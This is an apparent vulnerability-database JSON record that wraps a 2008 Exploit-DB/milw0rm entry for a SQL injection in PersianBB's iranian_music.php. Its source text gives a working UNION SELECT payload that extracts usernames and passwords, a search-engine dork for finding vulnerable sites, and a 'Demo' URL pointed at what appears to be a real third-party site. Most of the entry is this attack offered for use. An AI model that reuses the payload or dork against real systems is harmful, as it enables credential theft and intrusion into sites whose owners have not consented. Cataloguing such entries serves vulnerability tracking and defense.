{"id": "EDB-ID:6858", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PersianBB iranian_music.php id Remote SQL Injection Vulnerability", "description": "PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2008-10-28T00:00:00", "modified": "2008-10-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/6858/", "reporter": "Hussin X", "references": [], "cvelist": [], "lastseen": "2016-02-01T00:49:31", "viewCount": 4, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2016-02-01T00:49:31", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T00:49:31", "rev": 2}, "vulnersScore": 0.6}, "sourceHref": "https://www.exploit-db.com/download/6858/", "sourceData": "|___________________________________________________\n|\n| PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|---------------- Hussin X ------------------\n|\n| Author: Hussin X\n|\n| Home : WwW.IQ-ty.CoM\n|\n| email: darkangel_g85[at]Yahoo[DoT]com\n|\n|___________________________________________________\n|\n| script : http://www.persianbb.com/\n|\n| DorK : Powered By : PersianBB.com\n|___________________________________________________\n\nExploit:\n________\n\n\nwww.[target].com/Script/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--\n\n\nDemo:\n________\n\nhttp://persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--\n\n\n\n________________( Greetz )_____________________\n _____ ____ __ __ _ ____\n|_ _| | _ \\ \\ \\ / / / \\ / ___|\n | | | |_) | \\ V / / _ \\ | | _\n | | | _ < | | / ___ \\ | |_| |\n |_| |_| \\_\\ |_| /_/ \\_\\ \\____|\n_______________________________________________\n\n# milw0rm.com [2008-10-28]\n", "osvdbidlist": []}

{}